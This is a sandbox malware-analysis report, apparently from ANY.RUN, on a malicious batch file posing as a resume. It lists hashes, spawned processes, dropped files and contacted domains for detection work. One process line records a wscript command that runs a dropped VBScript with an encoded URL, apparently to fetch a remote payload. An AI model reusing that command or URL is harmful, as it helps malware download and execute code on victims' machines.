Field | Value
---|---
File name | Curriculo-102987912.cmd
Full analysis | https://app.any.run/tasks/101aada0-558e-46c2-b1dd-3c0882cace30
Verdict | Malicious activity
Analysis date | May 24, 2019, 16:00:39
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators |
MIME | text/x-msdos-batch
File info | DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5 | 7EF3A86F811ED8E436511DD188672D95
SHA1 | FCDE9DBD6A14B23F46B935F8A56E8AC6D9E1858A
SHA256 | AAF4001495B065C71165F10FE034A8DF27762D5E2E79C6F51E11848002F3AEEE
SSDEEP | 96:2dhDgbko5qn+6N4GuAkIpq0SRHmst/0P3teNPA+sV39pudOhH1QSsC:2dhDg17NN9q392C

PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3364 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Curriculo-102987912.cmd" " | C:\Windows\system32\cmd.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2276 | ping 127.0.0.1 -n 1 | C:\Windows\system32\PING.EXE | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: TCP/IP Ping Command; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1704 | wscript //Nologo "C:\ProgramData\windows\.GGGGGwu\admin.vbs" AS111 https://pt-br.ooguy.com/appkcmd/aHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2NvbnNvbGVjbG91ZC9mb2xkZXItbXMvQ0MxL29pNGZ0MWJwcXIuYm1wJm5vLXBvd2Vy | C:\Windows\system32\wscript.exe | | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3364 | cmd.exe | C:\ProgramData\windows\.GGGGGwu\admin.vbs | text | 5987D02D5211AF4979F80912EA56BDC7 | ECB8872428BFAB249DE3703DA21EDACCB5FE97C1542930CA06F043E8646139CF
1704 | wscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | D7A950FEFD60DBAA01DF2D85FEFB3862 | 75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1704 | wscript.exe | 54.207.55.139:443 | pt-br.ooguy.com | Amazon.com, Inc. | BR | unknown |

Domain | IP | Reputation
---|---|---
pt-br.ooguy.com | | unknown
edzz.la | | unknown